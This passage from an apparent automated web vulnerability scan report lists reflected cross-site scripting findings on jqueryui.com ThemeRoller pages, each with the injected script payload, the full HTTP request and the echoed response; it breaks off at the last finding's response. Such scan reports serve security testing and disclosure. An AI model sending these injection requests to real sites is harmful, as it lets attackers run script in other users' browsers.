
Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957bd"><script>alert(1)</script>c074e2c4424 was submitted in the opacityOverlay parameter. This input was echoed as 957bd\\\"><script>alert(1)</script>c074e2c4424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80957bd"><script>alert(1)</script>c074e2c4424&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="opacityOverlay" id="opacityOverlay" class="opacity" value="80957bd\\\"><script>alert(1)</script>c074e2c4424" />
...[SNIP]...

1.176. http://jqueryui.com/themeroller/_rollyourown.php [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"><script>alert(1)</script>8cf468a5797 was submitted in the opacityShadow parameter. This input was echoed as 190db\\\"><script>alert(1)</script>8cf468a5797 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60190db"><script>alert(1)</script>8cf468a5797&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="opacityShadow" id="opacityShadow" class="opacity" value="60190db\\\"><script>alert(1)</script>8cf468a5797" />
...[SNIP]...

1.177. http://jqueryui.com/themeroller/_rollyourown.php [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>d2f16d0fa46 was submitted in the thicknessShadow parameter. This input was echoed as 3b045\\\"><script>alert(1)</script>d2f16d0fa46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px3b045"><script>alert(1)</script>d2f16d0fa46&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="thicknessShadow" id="thicknessShadow" class="offset" value="7px3b045\\\"><script>alert(1)</script>d2f16d0fa46" />
...[SNIP]...

1.178. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorActive request parameter is copied into the HTML document as plain text between tags. The payload 57259<script>alert(1)</script>3ada87c4c0b was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=12121257259<script>alert(1)</script>3ada87c4c0b&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=12121257259<script>alert(1)</script>3ada87c4c0b&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHig
...[SNIP]...

1.179. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorContent request parameter is copied into the HTML document as plain text between tags. The payload fc267<script>alert(1)</script>1db7ecb42d6 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212fc267<script>alert(1)</script>1db7ecb42d6&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212fc267<script>alert(1)</script>1db7ecb42d6&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDe
...[SNIP]...

1.180. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 80a55<script>alert(1)</script>99652122893 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad80a55<script>alert(1)</script>99652122893&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
er=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad80a55<script>alert(1)</script>99652122893&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

1.181. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorError request parameter is copied into the HTML document as plain text between tags. The payload e3e18<script>alert(1)</script>4cf3cc26974 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ece3e18<script>alert(1)</script>4cf3cc26974&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:08 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ece3e18<script>alert(1)</script>4cf3cc26974&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family
...[SNIP]...

1.182. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 8cb93<script>alert(1)</script>2054306e127 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=8888888cb93<script>alert(1)</script>2054306e127&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

